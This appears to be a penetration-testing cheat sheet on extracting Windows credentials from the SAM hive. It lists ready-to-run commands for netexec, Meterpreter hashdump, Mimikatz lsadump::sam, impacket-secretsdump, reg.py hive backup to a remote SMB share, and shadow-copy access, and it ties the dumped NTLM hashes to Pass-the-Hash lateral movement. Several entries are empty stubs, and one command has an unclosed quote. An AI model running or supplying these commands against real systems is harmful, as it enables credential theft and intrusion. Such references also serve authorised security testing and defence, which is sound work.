githubEdit

Extract Credentials from SAM

Tools: CrackMapExec/Netexec , Meterpreter , Mimikatz , impacket-secretsdump , reg.py , vss shadow copies

1) CrackMapExec/Netexec

netexec smb IP_RANGE -u USER -p 'PASSWORD --sam

2) Meterpreter

hashdump

3) Mimikatz

mimikatz "privilege::debug" "lsadump::sam" "exit"

4) Secretsdump

impacket-secretsdump DOMAIN/USER:PASSWORD@IP

5) Reg.py

reg.py DOMAIN/USER:PASSWORD@IP backup -o '\\SMB_IP\share'

impacket-secretsdump -security SECURITY_FILE -system SYSTEM_FILE LOCAL

6) Shadow Copies (vss)

diskshadow list shadows all

mklink /d c:\shadowcopy \\?\GLOBALROOT\Device\Harddisk VolumeShadowCopy1\

7) SAM , SYSTEM and SECURITY hives backup copies

8) HiveDump

Load into memory

Dump

9) Mimikatz

Load into memory

Dump from SAM and SYSTEM. Ensure files are in the current working directory

Dump against the live hive files

With dumping the SAM hive, we dump NTLM hashes to perform Pass-the-Hash attacks (Lateral Movement)

Last updated